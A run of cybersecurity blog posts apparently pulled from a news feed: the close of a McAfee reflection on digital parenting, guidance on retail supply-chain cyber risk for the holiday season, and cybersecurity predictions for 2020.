The dark web is . . . unimaginably dark. The underbelly of the internet — the encrypted, anonymous terrain known as the Dark Web — has moved from covert to mainstream exposure. We’ve learned the hard way the degree of sophistication with which criminals engage in pornography, human trafficking, drug and weapon sales, and stolen data. With more knowledge, the public is taking more precautions especially when it comes to malware, phishing scams, and virus attacks launched through popular public channels.

There’s a lot of good going on. As much negative as we’ve seen and experienced online over the past decade, we’ve also learned that its power can be used equally to amplify the best of humanity. Social media has sparked social movements, helped first responders and brought strangers together in times of tragedy like no other medium in history.

Privacy is (finally) king. Ten years ago, we clicked on every link that came our way and wanted to share every juicy detail about our personal lives. We became publishers and public figures overnight and readily gave away priceless chunks of our privacy. The evolution and onslaught of data breaches, data mining, and malicious scams have educated us to safeguard our data and privacy like gold.

We’ve become content curators. The onslaught of fake news, photo apps, and filter bubbles have left our heads spinning and our allegiances confused. In the process, we’ve learned to be more discerning with the content we consume and share. While we’re not there yet, our collective digital literacy is improving as our understanding of various types of content grows.

Parents have become digital ninjas. The parenting tasks of monitoring, tracking, and keeping up with kids online have gone from daunting to doable for most parents. With the emotional issues now connected to social media, most parents don’t have the option of sitting on the sidelines and have learned to track their kids better than the FBI.

This is us

We’ve learned that for better or worse, this wired life is us. There’s no going back. Where once there may have been doubt a decade ago, today it’s clear we’re connected forever. The internet has become so deep-seated in our culture and homes that unplugging completely for most of us is no longer an option without severe financial (and emotional) consequences. The task ahead for this new decade? To continue working together to diminish the ugly side of technology — the bullying, the cruelty, the crime — and make the internet a safe, fun experience for everyone.

The post Lessons Learned: A Decade of Digital Parenting appeared first on McAfee Blogs.

How the Cyber Grinch Stole Christmas: Managing Retailer Supply Chain Cyber Risk

Cyber threats are always a prominent risk to businesses, especially those operating with high quantities of customer information in the retail space, with over 50% of global retailers were breached last year.  BitSight VP, Jake Olcott, has written guidance for retailers, on how to manage their supply-chain cyber risk to help prevent the 'Cyber Grinch' from not just stealing Christmas, but throughout the year, with four simple steps.


Cyber risk in retail is not a new concept. Retail is one of the most targeted industries when it comes to cyber-attacks. In fact, over 50% of global retailers were breached in the last year. Given the sensitive customer data these organizations often possess — like credit card information and personally identifiable information (PII) – it’s not surprising that attackers have been capitalizing on the industry for decades.

The Christmas shopping season can increase retailers’ cyber risk, with bad actors looking to take advantage of the massive surge of in-store and online shoppers that comes with it. What is important for retailers to keep in mind is that it’s not only their own network they have to worry about when it comes to mitigating cyber risk, but their entire supply chain ecosystem – from shipping distributors and production partners to point-of-sale technologies and beyond.

Take for example the infamous 2017 NotPetya attack that targeted large electric utilities, but actually ended up stalling operations for many retailers as a result. This nation-state attack had a snowball effect, wreaking havoc on shipping companies like FedEx and Maersk who are responsible for delivering many retail orders. FedEx operations were reduced to manual processes for pick-up, sort and delivery, and Maersk saw infections in part of its corporate network that paralyzed some systems in its container business and prevented retail customers from booking ships and receiving quotes.

For retailers, a cyber disruption in the supply chain can fundamentally disrupt operations, causing catastrophic harm to brand reputation, financial performance and regulatory repercussions – and the stakes are even higher during the make-or-break holiday sales period.

Here are some important steps they can take now to mitigate supply chain cyber risk this holiday season and beyond.
 
Step 1: Inventory your Supply Chain
A business today relies on an average of 89 vendors a week that have access to their network in order to perform various crucial business. As outsourcing and cloud adoption continue to rise across retail organizations, it is critical that they keep an up-to-date catalogue of every third party and service provider in the digital (or brick-and-mortar) supply chain and their network access points. These supply chain ecosystems can be massive, but previous examples have taught us that security issues impacting any individual organization can potentially disrupt the broader system.

An inventory of vendors and the systems they have access to allows security teams to keep track of all possible paths a cybercriminal may exploit and can help them better identify vulnerabilities and improve response time in the event of an incident.

Step 2: Take control of your Third-Party Accounts
Once you have a firm grasp of the supply chain, a critical focus should be to identify and manage any network accounts held by these organizations. While some suppliers may need access to complete their daily tasks, this shouldn’t mean handing them a full set of keys to the kingdom on their terms.

Retailers should ensure each vendor has an email account and credentials affiliated and managed by the retailer – not by the supplier organization and certainly not the user themselves. By taking this step, the retailer can ensure they are the first point of notification if and when an incident occurs and are in full control over the remediation process.


Step 3: Assess your Suppliers’ Security Posture
Retail security teams often conduct regular internal audits to evaluate their own security posture but fail to do so effectively when it comes to their supply chain relationships.

While a supplier’s security posture doesn’t necessarily indicate that their products and services contain security flaws, in the cyber world, where there’s smoke, there’s eventually fire. Poor security performance can be indicative of bad habits that could lead to increased vulnerability and risk exposure.

Having clear visibility into supplier security performance can help retailers quickly pinpoint security vulnerabilities and cyber incidents, while significantly speeding up communication and action to address the security concern at hand.

Step 4: Continuously Monitor for Changes
Third-party security performance assessment should not be treated as a one-and-done item on the supply chain management checklist.

The cyber threat landscape is volatile and ever-evolving, with new vulnerabilities and attack vectors cropping up virtually every day. That means retailers need solutions and strategies in place that provide a real-time, continuous and measurable pulse check of supplier security posture to ensure they are on top of potential threats before they impact the business and its customers.

Just as retailers track billions of packages and shipments in real-time to ensure there are no mistakes or bumps in the road, their vendor risk management program should be treated with the same due care.

This holiday season and beyond, it is critical that retailers invest in supply chain security management to reduce the risk of data breaches, slowdowns, and outages – and the costs and reputational damage that come along with them. After all, retailers are only as secure as their weakest third-party.

Accelerated Digital Innovation to impact the Cybersecurity Threat Landscape in 2020

Its December and the Christmas lights are going up, so it can't be too early for cyber predictions for 2020.   With this in mind, Richard Starnes, Chief Security Strategist at Capgemini, sets out what the priorities will be for businesses in 2020 and beyond.


Accelerated digital innovation is a double-edged sword that will continue to hang over the cybersecurity threat landscape in 2020.  As businesses rapidly chase digital transformation and pursue the latest advancements in 5G, cloud and IoT, they do so at the risk of exposing more of their operations to cyber-attacks. These technologies have caused an explosion in the number of end-user devices, user interfaces, networks and data; the sheer scale of which is a headache for any cybersecurity professional. 

In order to aggressively turn the tide next year, cyber analysts can no longer avoid AI adoption or ignore the impact of 5G. 

AI Adoption
Hackers are already using AI to launch sophisticated attacks – for example AI algorithms can send ‘spear phishing’ tweets six times faster than a human and with twice the success. In 2020, by deploying intelligent, predictive systems, cyber analysts will be better positioned to anticipate the exponentially growing number of threats.

The Convergence of IT and OT
At the core of the Industry 4.0 trend is the convergence of operations technology (OT) and information technology (IT) networks, i.e. the convergence of industrial and traditional corporate IT systems. While this union of these formerly disparate networks certainly facilitates data exchange and enables organisations to improve business efficiency, it also comes with a host of new security concerns.

5G and IoT
While 5G promises faster speed and bandwidth for connections, it also comes with a new generation of security threats. 5G is expected to make more IoT services possible and the framework will no longer neatly fit into the traditional security models optimised for 4G. Security experts warn of threats related to the 5G-led IoT growth anticipated in 2020, such as a heightened risk of Distributed Denial-of-Service (DDoS) attacks.

Death of the Password
2020 could see organisations adopt new and sophisticated technologies to combat risks associated with weak passwords.

More Power to Data Protection Regulations
In 2020, regulations like GDPR, The California Consumer Privacy Act and PSD2 are expected to get harsher. We might also see announcements of codes of conduct specific to different business sectors like hospitality, aviation etc. All this will put pressure on businesses to make data security a top consideration at the board level.